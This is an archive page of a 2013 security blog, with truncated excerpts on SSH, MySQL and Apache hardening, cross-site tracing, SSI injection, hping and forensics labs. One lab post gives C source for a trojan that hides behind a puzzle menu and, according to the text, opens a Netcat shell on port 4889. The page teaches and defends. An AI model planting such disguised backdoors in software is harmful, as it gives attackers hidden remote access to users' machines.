
Showing posts from February, 2013

Digital Forensic Lab

Forensic Lab

Life Without Netcat !!

We know Netcat is the Swiss army knife of networking: it can do many things at once without any add-ons, reading from and writing to raw TCP or UDP ports, so there is a lot you can do with Netcat in your hands. But what if your victim does not allow Netcat, does not have Netcat installed, or has a strong IDS with a Netcat signature?
Or
Suppose you are a system administrator and want to administer a machine remotely without Netcat on the client side?
If you cannot run Netcat on the victim (client) side, it is not the end of the world: you can use trivial system calls and methods to create a temporary connection very similar to Netcat. So in this post I want to enumerate some such trivial methods that can be used to produce a raw TCP/IP connection from one side to the other.
In this scenario we assume that our attacker or system administrator has Netcat at his disposal but somehow fails to implant it on the victim side because of some IDS or firewall, yet can run scripts there or can execut…

SSH Hardening

Tip 1: Generating a Key

Tip 2: Telling the SSH Server to Accept Your Key

Tip 3: Disable Root Logins

Tip 4: Disable SSH Password Logins

Tip 5: Run SSH on a Non-default Port

Tip 6: Use Fail2ban
Fail2ban scans log files (e.g. /var/log/apache/error_log) and bans IPs that show malicious signs: too many password failures, probing for exploits, etc. Generally Fail2Ban is then used to update firewall rules to reject the IP addresses for a specified amount of time, although any other arbitrary action (e.g. sending an email, or ejecting the CD-ROM tray) could also be configured. Out of the box Fail2Ban comes with filters for various services (apache, courier, ssh, etc.).

Hardening Mysql

MySQL is the world's most used open source relational database management system (RDBMS) as of 2008; it runs as a server providing multi-user access to a number of databases.
MySQL is a popular choice of database for use in web applications, and is a central component of the widely used LAMP open source web application software stack (and other 'AMP' stacks). LAMP is an acronym for "Linux, Apache, MySQL, Perl/PHP/Python." Free-software and open-source projects that require a full-featured database management system often use MySQL.

As you all know, with great power comes great responsibility :D ... and malware too ;-). So how can we make it difficult or impossible for any hacker to exploit our network by leveraging a flaw in MySQL running on our system?
The following tips will answer this question in depth:
Tip 1: Disable Remote Access
To restrict MySQL from opening a network socket, the following parameter should be added in the [mysqld] section of my.cnf or my.ini:
skip-n…

CROSS-SITE TRACING

When a client makes a request, that request may have to travel through firewalls, proxies, gateways, or other applications. Each of these has the opportunity to modify the original HTTP request. The TRACE method allows clients to see how their request looks when it finally makes it to the server. A TRACE request initiates a "loopback" diagnostic at the destination server. The server at the final leg of the trip bounces back a TRACE response, with the virgin request message it received in the body of its response. A client can then see how, or if, its original message was munged or modified along the request/response chain of any intervening HTTP applications.
"TRACE" is used simply as an input data echo mechanism for the HTTP protocol. This request method is commonly used for debugging and other connection analysis activities. An HTTP TRACE request (containing the request line, headers and post data), sent to a TRACE-supporting web server, will be answered to the client with the information…

SSI Injection Attack

SSIs are directives present in web applications used to feed an HTML page with dynamic content. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. To do so, the web server analyzes the SSI directives before supplying the page to the user. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts into HTML pages or executing arbitrary code remotely. It can be exploited through manipulation of SSI in use in the application, or by forcing its use through user input fields. It is possible to check whether the application is properly validating input field data by inserting characters that are used in SSI directives, such as:
    Code: < ! # = / . " - > and [a-zA-Z0-9]
Another way to discover whether the application is vulnerable is to verify the presence of pages with the extensions .stm, .shtm and .shtml. However, the lack of these types of pages does not mean that the app…

Hardening Apache2

Security Tip 1: Disable the Apache Signature and/or Apache Banner
Apache Signature and Apache Banner are basically the same thing. It is the application name together with the version that is printed when performing a web request. Nobody actually needs this information at all, but it is enabled by default. You need to alter the Apache configuration file to disable it:
    ServerSignature Off
    ServerTokens ProductOnly
In Ubuntu, you need to change the following file: /etc/apache2/conf.d/security. Double check that ServerSignature and ServerTokens are not enabled in some other part of the configuration.


Security Tip 2: The TRACE HTTP Request
The HTTP TRACE request is used to echo back all received information. It can be abused to print HTTP cookies and, as a result, steal an HTTP session. Basically this request can be used as part of a Cross-Site Scripting (XSS) attack. It is recommended to disable it as a security precaution. Add the following to the web server's configu…

Ethical Hacking Lab-0x03

Aim: Create a Backdoor
#include <stdio.h>
#include "nc.c"          /* companion file (download link below) that defines backdoor() */

int main(void)
{
    int i;

    /* Harmless-looking menu shown to the user. */
    printf("Logic puzzle\nselect option:\n1)Author\n2)About\n");
    if (scanf("%d", &i) != 1)
        return 1;        /* no valid number was entered */

    switch (i)
    {
    case 1:
        printf("Author: ");
        printf("Vishal Mishra\n");
        break;
    case 2:
        printf("Version .007 \n");
        backdoor();      /* starts the nc listener described below */
        break;
    }

    return 0;
}

Click here to download:
=> Prog.c
=> nc.c

As soon as the victim runs this program, nc starts listening in the background on port number 4889 with a shell bound to it. So this is an example of a very simple backdoor/trojan that can give an attacker access to your computer.
To prevent this attack, use a good firewall. Also keep checking at regular intervals which ports are open on your system; if you find anything suspicious, immediately close it or try to find out what service is using it.
You can do this using the netstat command. It is available on Linux as well as on Windows operating systems.
If you are on a window…

Digital Forensics Lab

Aim: Computer hardware discovery and identifying evidence.
Click here to download the lab file

hping

Hping3 and Hping2
hping is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the Idle Scan scanning technique now implemented in the Nmap port scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string-based, human-readable description of TCP/IP packets, so that the programmer can write scripts related to low-level TCP/IP packet manipulation and analysis in a very short time. Like most tools used in computer security, hping is useful to security experts, but there are a lot of applications related to network testing and system administration.
Since version 3, which is now in alpha stage, hping is trying not to be just a little tool but to become a framework for scripting related to TCP/IP testing and security. hping3 continues to be command-line compatible with hping2, but integrates two main new …